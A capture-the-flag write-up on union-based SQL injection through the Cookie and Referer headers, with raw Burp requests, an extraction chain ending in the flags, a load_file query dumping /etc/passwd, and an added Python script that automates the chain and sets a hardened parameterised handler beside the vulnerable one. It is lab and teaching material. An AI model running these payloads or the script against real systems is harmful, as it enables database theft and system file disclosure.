CTFHUB

Cookie injection

Tool: Burp Suite
Challenge hint: "The input point has changed this time. Try looking for the Cookie."
The page runs a query of the form
select * from news where id=1
and with id=1 in the Cookie it prints two fields, so a two-column union is the natural extraction vector:
ID: 1
Data: ctfhub

GET / HTTP/1.1
Host: challenge-01b55e9bf85f0710.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select version(),database(); hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1


GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database(); hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1


GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name="bnuisrgwep"; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1


GET / HTTP/1.1
Host: challenge-17debe2ac4f262de.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 1, group_concat(mupbzaevry) from sqli.bnuisrgwep; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1


MySQL structure

  • Finding the version and the current database
select * from news where id=-1 union select version(),database()
ID: 10.3.22-MariaDB-0+deb10u1
Data: sqli

  • Finding the table names
select * from news where id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'--

ID: 1
Data: ttrdbwiill,news

  • Finding the column names
select * from news where id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name='ttrdbwiill'
ID: 1
Data: gdbhmtwwza

  • Reading the flag
select * from news where id=-1 union select 1,group_concat(gdbhmtwwza) from sqli.ttrdbwiill

ID: 1
Data: ctfhub{c6039bafb52839c4e0fb47d9}

Other queries:

select * from news where id=-1 union select 1,group_concat(schema_name) from information_schema.schemata

ID: 1
Data: information_schema,mysql,performance_schema,sqli

select * from news where id=-2 union select 1,load_file('/etc/passwd')

load_file() only returns file contents when the database account has the FILE privilege and secure_file_priv does not restrict the path; otherwise it returns NULL. Here it works, and the browser collapses the newlines of the file into one line:

ID: 1
Data:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,:/nonexistent:/bin/false

Referer injection

The page prompts: "Please enter the ID in the Referer." The Referer header value is used directly as the id, so the same union chain applies.

  • Finding the database name
    select * from news where id=-1 union select 1,database()
    ID: 1
    Data: sqli

  • Finding the tables
    select * from news where id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
    ID: 1
    Data: news,nvtycnwnmh

  • Finding the column names
    select * from news where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='nvtycnwnmh'
    ID: 1
    Data: xrfwvedani

  • Finding the flag
    select * from news where id=-1 union select 1,group_concat(xrfwvedani) from nvtycnwnmh
    ID: 1
    Data: ctfhub{48eb7eee2b8ca6bae5fe6893}
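Added example, not part of this write-up or of the CTFHUB challenge code: the union chain used in the Cookie, MySQL-structure and Referer sections above, driven by a script against a stand-in page instead of Burp. SQLite replaces the challenge's MariaDB so it runs offline, which means information_schema.tables and .columns become sqlite_master and pragma_table_info(); the table, column and flag values are constructed, and the hint cookie value is the one from the requests above. A hardened handler sits next to the vulnerable one to show why the challenge is injectable: the header value is concatenated into the query instead of being checked and bound.

```python
"""Union-based SQL injection via a request header (added example, not CTFHUB code).
SQLite stands in for the challenge's MariaDB so this runs offline:
sqlite_master / pragma_table_info() replace information_schema."""
import re
import sqlite3
from urllib.parse import unquote

FLAG = "ctfhub{constructed_flag_for_this_demo}"  # constructed, not a challenge flag


def build_db():
    """In-memory copy of the challenge schema: news plus one random-named flag table."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "create table news (id integer, data text);"
        "insert into news values (1, 'ctfhub');"
        "create table ttrdbwiill (gdbhmtwwza text);"
        f"insert into ttrdbwiill values ('{FLAG}');"
    )
    return db


def cookie_field(raw, name):
    """PHP-style Cookie parse: split on ';', the first '=' separates key and value."""
    for part in raw.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return unquote(value)
    return None


def render(rows):
    """Print rows the way the challenge page does: one ID/Data pair per row."""
    return "".join(f"ID: {i}\nData: {d}\n" for i, d in rows)


def vulnerable_page(db, user_id):
    """Concatenates the header value into SQL, as the challenge hint shows."""
    return render(db.execute("select * from news where id=" + user_id).fetchall())


def hardened_page(db, user_id):
    """Same lookup with an integer check and a bound parameter; a union never reaches SQL."""
    if not re.fullmatch(r"-?\d{1,10}", user_id):
        return render([])
    return render(db.execute("select * from news where id=?", (int(user_id),)).fetchall())


# ---- attacker side: the write-up's stages, driven automatically ----------------
def data_field(body):
    """Pull the 'Data:' line out of the page; that is where the union output lands."""
    m = re.search(r"^Data: (.*)$", body, re.M)
    return m.group(1) if m else ""


def dump_flag(send):
    """send(payload) -> page body.  Tables -> columns -> rows, like the write-up."""
    tables = data_field(send(
        "-1 union select 1,group_concat(name) from sqlite_master where type='table'"))
    if not tables:
        return None  # no union output: the injection point is not there (or is fixed)
    target = next(t for t in tables.split(",") if t != "news")
    columns = data_field(send(
        f"-1 union select 1,group_concat(name) from pragma_table_info('{target}')"))
    column = columns.split(",")[0]
    return data_field(send(f"-1 union select 1,group_concat({column}) from {target}"))


def attack(page, via="cookie"):
    """Run the chain against `page` through the Cookie or the Referer injection point."""
    db = build_db()

    def send(payload):
        if via == "cookie":
            # the payload rides beside the challenge's own 'hint' cookie
            raw = f"id={payload}; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F"
            return page(db, cookie_field(raw, "id"))
        return page(db, payload)  # Referer challenge: the header value is the id itself

    return dump_flag(send)


if __name__ == "__main__":
    print("vulnerable via Cookie: ", attack(vulnerable_page))
    print("vulnerable via Referer:", attack(vulnerable_page, "referer"))
    print("hardened:              ", attack(hardened_page))
```

Against a live target, `send` would set the Cookie or Referer header on a real request and return the response body; the parsing of `Data:` and the stage order are unchanged. The hardened handler rejects the payload at the integer check before any SQL runs, which is why dump_flag() gets no table list and stops.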
